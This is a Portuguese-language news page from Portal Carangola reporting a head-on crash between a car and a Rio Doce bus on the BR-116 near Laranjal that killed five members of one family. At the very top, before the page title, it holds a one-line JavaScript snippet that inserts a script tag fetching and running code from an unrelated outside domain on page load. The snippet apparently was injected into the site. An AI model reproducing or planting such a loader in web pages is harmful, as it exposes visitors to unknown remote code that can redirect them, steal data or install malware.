;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Cinco pessoas de uma mesma família morrem em colisão entre carro e ônibus na BR-116 - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Cinco pessoas de uma mesma família morrem em colisão entre carro e ônibus na BR-116

Cinco pessoas de uma mesma família morreram, no início da manhã deste sábado (29), em um acidente no km 737 da BR-116, próximo a cidade de Laranjal.
De acordo com as primeiras informações, um GM Celta, que seguia de Petrópolis, na região serrana do Rio de Janeiro, para a cidade de Miradouro, bateu de frente cem um ônibus da viação Rio Doce, que saiu de Nanuque(MG) com destino a Juiz de Fora.
As cinco pessoas que morreram em um acidente entre um GM Celta e um Ônibus da Viação Rio Doce, no início desta manhã (29), na BR-116, em Laranjal, foram identificadas oficialmente.
Estavam no Celta, Ana Maria Teixeira Serafim (53), seus três filhos, Luiz Miguel Serafim (21), condutor; Jésus Luiz Serafim (17); Luiz Felipe André Serafim (14) e um neto, Kaic José Ramos (3).
Segundo o que foi apurado até agora, o carro seguia de Petrópolis, na região serrana do Rio de Janeiro, para a cidade de Miradouro e invadiu a contramão em uma curva, se chocando de frente em um ônibus da viação Rio Doce, que saiu de Nanuque (MG) com destino a Juiz de Fora, levando 33 passageiros, que nada sofreram.
O automóvel ficou preso de baixo do coletivo e os corpos foram retirados das ferragens por bombeiros de Muriaé, sendo encaminhados ao IML da cidade..
Bombeiros de Muriaé estão no local assim como a perícia e a polícia rodoviária federal, que controla o trânsito.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.